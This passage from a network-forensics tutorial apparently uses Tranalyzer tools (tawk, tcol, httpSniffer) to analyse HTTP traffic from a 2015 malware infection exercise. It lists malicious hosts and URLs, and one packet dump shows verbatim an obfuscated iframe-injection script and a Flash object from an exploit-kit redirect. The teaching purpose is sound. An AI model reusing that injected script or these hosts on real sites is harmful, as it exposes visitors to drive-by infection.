A     25       0x0400000000004000  1431031908.780729000  1431031912.367847000  3.587118000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           192.168.138.158  07       "Private network"                 49202    72.34.49.86      us       "IHNetworks"                      80       6        0x02             0x006c    0x0001      0x08         0x0001         0x0010      0_1           0                      1_0_0_0_0_1_0_0_0_1                          0_0_0_0_0_1_0                    "comarksecurity.com"               "/wp-content/themes/grizzly/img5.php?u=mfymi71rapdzk"          "application/x-www-form-urlencoded"                                                                                                                                                                                                                 "_wp-content_themes_grizzly_img5.php_u=mfymi71rapdzk_25_A_1_0"                                                                                                        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"                                                                                                                                  
B     25       0x0400000000004001  1431031908.886579000  1431031912.367927000  3.481348000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           72.34.49.86      us       "IHNetworks"                      80       192.168.138.158  07       "Private network"                 49202    6        0x02             0x0078    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "_wp-content_themes_grizzly_img5.php_u=mfymi71rapdzk_25_B_1_0"                                                                                                                                                                                                                                                                                "Apache"                                          "PHP/5.3.29"
A     26       0x0400000000004000  1431031914.993554000  1431031915.185509000  0.191955000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           192.168.138.158  07       "Private network"                 49203    204.152.254.221  us       "Brinkster Communications Corpo"  80       6        0x02             0x006c    0x0001      0x08         0x0001         0x0010      0_1           0                      1_0_0_0_0_1_0_0_0_1                          0_0_0_0_0_1_0                    "runlove.us"                       "/wp-content/themes/twentyfifteen/img5.php?f=ka6nnuvccqlw9"    "application/x-www-form-urlencoded"                                                                                                                                                                                                                 "_wp-content_themes_twentyfifteen_img5.php_f=ka6nnuvccqlw9_26_A_1_0"                                                                                                  "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"                                                                                                                                  
B     26       0x0400000000004001  1431031915.035444000  1431031915.185568000  0.150124000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           204.152.254.221  us       "Brinkster Communications Corpo"  80       192.168.138.158  07       "Private network"                 49203    6        0x02             0x0068    0x0000      0x00         0x0040         0x0010      0_0           1          404         0_0_0_1_0_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "_wp-content_themes_twentyfifteen_img5.php_f=ka6nnuvccqlw9_26_B_1_0"                                                                                                                                                                                                                                                                          "Apache"                                          
A     33       0x0400000000004000  1431031945.999417000  1431032021.842696000  75.843279000  1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           192.168.138.158  07       "Private network"                 49209    95.163.121.204   ru       "Digital Network JSC"             80       6        0x42             0x006c    0x0000      0x0a         0x0001         0x0010      1_1           0                      2_0_0_0_0_1_0_1_2_1                          0_0_0_0_0_1_0                    "7oqnsnzwwnm6zb7y.gigapaysun.com"  "/img/flags/de.png";"/11iQmfg"                                 "application/x-www-form-urlencoded"     "PHPSESSID=uqq1670l1pkd07vgdnsg98dee5";"PHPSESSID=uqq1670l1pkd07vgdnsg98dee5"                                                                                                                               "_11iQmfg_33_A_2_0"                                                                                                                                                   "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"            "http://7oqnsnzwwnm6zb7y.gigapaysun.com/11iQmfg"                                                                      
B     33       0x0400000000004001  1431031946.199749000  1431031957.906658000  11.706909000  1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           95.163.121.204   ru       "Digital Network JSC"             80       192.168.138.158  07       "Private network"                 49209    6        0x02             0x0078    0x0000      0x00         0x0044         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_2                          1_0_0_0_1_0_0                                                                                                                      "image/png";"text/html"                                                                                                "_img_flags_de.png_33_B_1_0"                                                                                                                                                                         "_11iQmfg_33_B_2_0"                                                                                                                                                                                                                                                                                                                           "nginx/1.2.1"                                     "PHP/5.4.39-0+deb7u2"
B     30       0x0400000000004001  1431031944.192640000  1431031960.017404000  15.824764000  1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           95.163.121.204   ru       "Digital Network JSC"             80       192.168.138.158  07       "Private network"                 49206    6        0x02             0x0068    0x0000      0x00         0x0044         0x0010      0_0           2          200;304     0_0_0_1_0_0_0_0_0_2                          2_0_0_0_1_0_0                                                                                                                      "text/css";"image/png"                                                                                                 "_img_flags_it.png_30_B_5_0";"_img_flags_fr.png_30_B_6_1"                                                                                                                                            "_img_style.css_30_B_1_0"                                                                                                                                                                                                                                                                                                                     "nginx/1.2.1"                                     
B     29       0x0400000000004001  1431031941.537441000  1431031962.048801000  20.511360000  1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           95.163.121.204   ru       "Digital Network JSC"             80       192.168.138.158  07       "Private network"                 49205    6        0x02             0x0068    0x0000      0x00         0x0044         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_2                          3_0_0_0_1_0_0                                                                                                                      "text/html";"image/png"                                                                                                "_img_flags_us.png_29_B_3_0";"_img_rt.png_29_B_4_1";"_img_bitcoin.png_29_B_5_2"                                                                                                                      "_11iQmfg_29_B_1_0"                                                                                                                                                                                                                                                                                                                           "nginx/1.2.1"                                     "PHP/5.4.39-0+deb7u2"
B     34       0x0400000000004001  1431031946.186402000  1431031962.095257000  15.908855000  1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           95.163.121.204   ru       "Digital Network JSC"             80       192.168.138.158  07       "Private network"                 49210    6        0x02             0x0068    0x0000      0x00         0x0004         0x0010      0_0           1          200         0_0_0_1_0_0_0_0_0_1                          3_0_0_0_0_0_0                                                                                                                      "image/png"                                                                                                            "_img_lt.png_34_B_1_0";"_img_lb.png_34_B_2_1";"_img_button_pay.png_34_B_3_2"                                                                                                                                                                                                                                                                                                                                                                                                                                                                       "nginx/1.2.1"

Now you see all HTTP commands being exchanged including content names and files. Yes, really fishy. If you want to see which host requests which file:

tawk -H '{ print $httpHosts, $httpURL }' ~/results/2015-05-08-traffic-analysis-exercise_flows.txt | sort | tcol

"62.75.195.236"                                                                  "/?34eaf8bd50d85d8c6baacb45f0a7b22e"
"62.75.195.236"                                                                  "/?3a08b0be8322c244f5a1cb9c1057d941"
"62.75.195.236"                                                                  "/?51424ddd486ff06861fceed24e86b329"
"62.75.195.236"                                                                  "/?60dbe33b908e0086292196ef001816bc"
"62.75.195.236"                                                                  "/aa25f5fe2875e3d0a244e6969e589cc4"
"62.75.195.236"                                                                  "/?b2566564b3ba1a38e61c83957a7dbcd5"
"62.75.195.236"                                                                  "/?b514ee6f0fe486009a6d83b035a4c0bd"
"62.75.195.236"                                                                  "/?d71e0bd86db9587158745a986a4b3606"
"7oqnsnzwwnm6zb7y.gigapaysun.com"                                                "/11iQmfg";"/img/flags/us.png";"/img/rt.png";"/img/bitcoin.png"
"7oqnsnzwwnm6zb7y.gigapaysun.com"                                                "/img/flags/de.png";"/11iQmfg"
"7oqnsnzwwnm6zb7y.gigapaysun.com"                                                "/img/flags/es.png";"/favicon.ico"
"7oqnsnzwwnm6zb7y.gigapaysun.com"                                                "/img/lt.png";"/img/lb.png";"/img/button_pay.png"
"7oqnsnzwwnm6zb7y.gigapaysun.com"                                                "/img/style.css";"/img/flags/it.png";"/img/flags/fr.png"
"7oqnsnzwwnm6zb7y.gigapaysun.com"                                                "/picture.php?k=11iqmfg&b7f2a994c3eaaf014608b272c46cf764";"/img/rb.png"
"comarksecurity.com"                                                             "/wp-content/themes/grizzly/img5.php?c=cdcnw7cfz43rmtg"
"comarksecurity.com"                                                             "/wp-content/themes/grizzly/img5.php?t=8r1gf1b2t1kuq42"
"comarksecurity.com"                                                             "/wp-content/themes/grizzly/img5.php?u=ka6nnuvccqlw9"
"comarksecurity.com"                                                             "/wp-content/themes/grizzly/img5.php?u=mfymi71rapdzk"
"ip-addr.es"                                                                     "/"
"r03afd2.c3008e.xc07r.b0f.a39.h7f0fa5eu.vb8fbl.e8mfzdgrf7g0.groupprograms.in"    "/"
"runlove.us"                                                                     "/wp-content/themes/twentyfifteen/img5.php?f=ka6nnuvccqlw9"
"runlove.us"                                                                     "/wp-content/themes/twentyfifteen/img5.php?l=8r1gf1b2t1kuq42"
"runlove.us"                                                                     "/wp-content/themes/twentyfifteen/img5.php?t=cdcnw7cfz43rmtg"
"runlove.us"                                                                     "/wp-content/themes/twentyfifteen/img5.php?u=mfymi71rapdzk"
"ubb67.3c147o.u806a4.w07d919.o5f.f1.b80w.r0faf9.e8mfzdgrf7g0.groupprograms.in"   "/"
"va872g.g90e1h.b8.642b63u.j985a2.v33e.37.pa269cc.e8mfzdgrf7g0.groupprograms.in"  "/?285a4d4e4e5a4d4d4649584c5d43064b4745"

Look at the hosts and the URLs. That is malware.

The command and its output can be simplified further by using one of tawk example function, namely httpHostsURL():

tawk -e 'httpHostsURL()' ~/results/2015-05-08-traffic-analysis-exercise_flows.txt

62.75.195.236
	/?34eaf8bd50d85d8c6baacb45f0a7b22e
	/?3a08b0be8322c244f5a1cb9c1057d941
	/?51424ddd486ff06861fceed24e86b329
	/?60dbe33b908e0086292196ef001816bc
	/?b2566564b3ba1a38e61c83957a7dbcd5
	/?b514ee6f0fe486009a6d83b035a4c0bd
	/?d71e0bd86db9587158745a986a4b3606
	/aa25f5fe2875e3d0a244e6969e589cc4

7oqnsnzwwnm6zb7y.gigapaysun.com
	/11iQmfg
	/favicon.ico
	/img/bitcoin.png
	/img/button_pay.png
	/img/flags/de.png
	/img/flags/es.png
	/img/flags/fr.png
	/img/flags/it.png
	/img/flags/us.png
	/img/lb.png
	/img/lt.png
	/img/rb.png
	/img/rt.png
	/img/style.css
	/picture.php?k=11iqmfg&b7f2a994c3eaaf014608b272c46cf764

comarksecurity.com
	/wp-content/themes/grizzly/img5.php?c=cdcnw7cfz43rmtg
	/wp-content/themes/grizzly/img5.php?t=8r1gf1b2t1kuq42
	/wp-content/themes/grizzly/img5.php?u=ka6nnuvccqlw9
	/wp-content/themes/grizzly/img5.php?u=mfymi71rapdzk

ip-addr.es
	/

r03afd2.c3008e.xc07r.b0f.a39.h7f0fa5eu.vb8fbl.e8mfzdgrf7g0.groupprograms.in
	/

runlove.us
	/wp-content/themes/twentyfifteen/img5.php?f=ka6nnuvccqlw9
	/wp-content/themes/twentyfifteen/img5.php?l=8r1gf1b2t1kuq42
	/wp-content/themes/twentyfifteen/img5.php?t=cdcnw7cfz43rmtg
	/wp-content/themes/twentyfifteen/img5.php?u=mfymi71rapdzk

ubb67.3c147o.u806a4.w07d919.o5f.f1.b80w.r0faf9.e8mfzdgrf7g0.groupprograms.in
	/

va872g.g90e1h.b8.642b63u.j985a2.v33e.37.pa269cc.e8mfzdgrf7g0.groupprograms.in
	/?285a4d4e4e5a4d4d4649584c5d43064b4745

In the packet file you can see all the payload in the original.

tcol ~/results/2015-05-08-traffic-analysis-exercise_packets.txt

%pktNo  flowInd  flowStat            time                  pktIAT        pktTrip       flowDuration  numHdrs  hdrDesc       vlanID  srcMac             dstMac             ethType  srcIP            srcIPCC  srcIPOrg                        srcPort  dstIP            dstIPCC  dstIPOrg                        dstPort  l4Proto  tcpStatesAFlags  httpStat  httpAFlags  httpMethods  httpHeadMimes  httpCFlags  l7Content
1       1        0x0400000000004000  1431031896.723375000  0.000000000   0.000000000   0.000000000   3        eth:ipv4:udp          00:00:00:00:00:00  00:00:00:00:00:00  0x0800   192.168.138.158  07       Private network                 60078    192.168.138.2    07       Private network                 53       17       0x00             0x0000    0x0000      0x00         0x0000         0x0010      G............va872g.g90e1h.b8.642b63u.j985a2.v33e.37.pa269cc\fe8mfzdgrf7g0\rgroupprograms.in.....
2       1        0x0400000000004001  1431031896.874326000  0.000000000   0.150951040   0.000000000   3        eth:ipv4:udp          00:00:00:00:00:00  00:00:00:00:00:00  0x0800   192.168.138.2    07       Private network                 53       192.168.138.158  07       Private network                 60078    17       0x00             0x0000    0x0000      0x00         0x0000         0x0010      G............va872g.g90e1h.b8.642b63u.j985a2.v33e.37.pa269cc\fe8mfzdgrf7g0\rgroupprograms.in......\f..........>K..
3       2        0x0400000000004000  1431031896.958320000  0.000000000   0.000000000   0.000000000   3        eth:ipv4:tcp          00:00:00:00:00:00  00:00:00:00:00:00  0x0800   192.168.138.158  07       Private network                 49184    62.75.195.236    il       Not allocated by APNIC          80       6        0x00             0x0000    0x0000      0x00         0x0000         0x0010      
4       2        0x0400000000004001  1431031897.090353000  0.000000000   0.132033024   0.000000000   3        eth:ipv4:tcp          00:00:00:00:00:00  00:00:00:00:00:00  0x0800   62.75.195.236    il       Not allocated by APNIC          80       192.168.138.158  07       Private network                 49184    6        0x00             0x0000    0x0000      0x00         0x0000         0x0010      
5       2        0x0400000000004000  1431031897.090448000  0.132128000   0.000095000   0.132128000   3        eth:ipv4:tcp          00:00:00:00:00:00  00:00:00:00:00:00  0x0800   192.168.138.158  07       Private network                 49184    62.75.195.236    il       Not allocated by APNIC          80       6        0x00             0x0000    0x0000      0x00         0x0000         0x0010      
6       2        0x0400000000004000  1431031897.091322000  0.000874000   0.000969000   0.133002000   3        eth:ipv4:tcp          00:00:00:00:00:00  00:00:00:00:00:00  0x0800   192.168.138.158  07       Private network                 49184    62.75.195.236    il       Not allocated by APNIC          80       6        0x00             0x002c    0x0000      0x02         0x0000         0x0010      GET /?285a4d4e4e5a4d4d4649584c5d43064b4745 HTTP/1.1\r\nAccept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nAccept-Encoding: gzip, deflate\r\nHost: va872g.g90e1h.b8.642b63u.j985a2.v33e.37.pa269cc.e8mfzdgrf7g0.groupprograms.in\r\nConnection: Keep-Alive\r\n\r\n
7       2        0x0400000000004001  1431031897.091382000  0.001029000   0.000060000   0.001029000   3        eth:ipv4:tcp          00:00:00:00:00:00  00:00:00:00:00:00  0x0800   62.75.195.236    il       Not allocated by APNIC          80       192.168.138.158  07       Private network                 49184    6        0x00             0x0000    0x0000      0x00         0x0000         0x0010      
8       2        0x0400000000004001  1431031897.453906000  0.362524000   0.362584000   0.363553000   3        eth:ipv4:tcp          00:00:00:00:00:00  00:00:00:00:00:00  0x0800   62.75.195.236    il       Not allocated by APNIC          80       192.168.138.158  07       Private network                 49184    6        0x00             0x0028    0x0000      0x00         0x0040         0x0010      HTTP/1.1 200 OK\r\nDate: Thu, 07 May 2015 20:51:34 GMT\r\nServer: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6\r\nX-Powered-By: PHP/5.3.3\r\nContent-Length: 560\r\nConnection: close\r\nContent-Type: text/html\r\n\r\n<html><body><object type="application/x-shockwave-flash" allowScriptAccess="always" width="434" height="449"><param name="movie" value="http://ubb67.3c147o.u806a4.w07d919.o5f.f1.b80w.r0faf9.e8mfzdgrf7g0.groupprograms.in/"><param name="play" value="true"></object><script>var fhxa45 = document.createElement('if'+'rame');fhxa45.setAttribute('src', 'http://r03afd2.c3008e.xc07r.b0f.a39.h7f0fa5eu.vb8fbl.e8mfzdgrf7g0.groupprograms.in/');fhxa45.setAttribute('width', 434);fhxa45.setAttribute('height', 449);document.body.appendChild(fhxa45);</script></body></html>
9       2        0x0400000000004000  1431031897.454085000  0.362763000   0.000179008   0.495765000   3        eth:ipv4:tcp          00:00:00:00:00:00  00:00:00:00:00:00  0x0800   192.168.138.158  07       Private network                 49184    62.75.195.236    il       Not allocated by APNIC          80       6        0x00             0x002c    0x0000      0x02         0x0000         0x0010
...

Data carving with httpSniffer

Now we are interested to extract the content. Set HTTP_SAVE_IMAGE, HTTP_SAVE_TEXT and HTTP_SAVE_APPL to 1 in httpSniffer.h, recompile httpSniffer and rerun t2.

t2conf httpSniffer -D HTTP_SAVE_IMAGE=1 -D HTTP_SAVE_TEXT=1 -D HTTP_SAVE_APPL=1 && t2build httpSniffer

t2 -r ~/data/2015-05-08-traffic-analysis-exercise.pcap -w ~/results

...
--------------------------------------------------------------------------------
tcpStates: Aggregated tcpStatesAFlags=0x42
httpSniffer: Aggregated httpStat=0xc53c
httpSniffer: Aggregated httpAFlags=0x1113
httpSniffer: Aggregated httpCFlags=0x0010
httpSniffer: Aggregated httpHeadMimes=0x0045
httpSniffer: Number of files img_vid_aud_msg_txt_app_unk: 13_0_0_0_22_10_0
httpSniffer: Max number of file handles: 7
httpSniffer: Number of HTTP packets: 399 [52.43%]
httpSniffer: Number of HTTP GET  requests: 28 [7.02%]
httpSniffer: Number of HTTP POST requests: 9 [2.26%]
httpSniffer: HTTP GET/POST ratio: 3.11
--------------------------------------------------------------------------------
...

The 2nd line in the httpSniffer end report indicates that 7 files are extracted.

tawk -V httpStat=0xc53c -V httpAFlags=0x1113 -V httpCFlags=0x0010 -V httpHeadMimes=0x0045

The httpStat column with value 0xc53c is to be interpreted as follows:

   bit | httpStat | Description
   =============================================================================
     2 | 0x0004   | Internal state: pending URL name
     3 | 0x0008   | HTTP flow
     4 | 0x0010   | Internal state: Chunked transfer
     5 | 0x0020   | Internal state: HTTP flow detected
     8 | 0x0100   | Internal state: header shift
    10 | 0x0400   | Internal state: image payload sniffing
    14 | 0x4000   | Internal state: text payload sniffing
    15 | 0x8000   | Internal state: application payload sniffing


The httpAFlags column with value 0x1113 is to be interpreted as follows:

   bit | httpAFlags | Description
   =============================================================================
     0 | 0x0001     | POST query with parameters
     1 | 0x0002     | Host is IPv4, e.g., Host: 1.2.3.4
     4 | 0x0010     | Sequence number violation
     8 | 0x0100     | X-Site Scripting protection
    12 | 0x1000     | Possible EXE download


The httpCFlags column with value 0x0010 is to be interpreted as follows:

   bit | httpCFlags | Description
   =============================================================================
     4 | 0x0010     | Potential HTTP content


The httpHeadMimes column with value 0x0045 is to be interpreted as follows:

   bit | httpHeadMimes | Description
   =============================================================================
     0 | 0x0001        | Application
     2 | 0x0004        | Image
     6 | 0x0040        | Text

Now look into /tmp/:

ls /tmp

httpAppl        httpPicture     httpText        ...

Look into /tmp/httpPicture:

ls /tmp/httpPicture

_favicon.ico_1_31_2_1       _img_button_pay.png_1_34_3_2   _img_flags_es.png_1_31_1_0   _img_flags_it.png_1_30_5_0   _img_lb.png_1_34_2_1   _img_rb.png_1_32_3_1  '_picture.php_k=11iqmfg&b7f2a994c3eaaf014608b272c46cf764_1_32_1_0'
_img_bitcoin.png_1_29_5_2   _img_flags_de.png_1_33_1_0     _img_flags_fr.png_1_30_6_1   _img_flags_us.png_1_29_3_0   _img_lt.png_1_34_1_0   _img_rt.png_1_29_4_1

The files are directly linked to the flow via its name coding:

Filename_Flow-Dir(0/1)_findex_#Packet-in-Flow_#Mimetype-in-Flow

Open the pics with your file browser or with an image viewer (eog, feh, …), as you wish. Be careful with the application folder.

Conclusion

Don’t forget to reset the plugin configuration for the next tutorial.

t2conf httpSniffer --reset && t2build httpSniffer

Have fun analyzing HTTP traffic!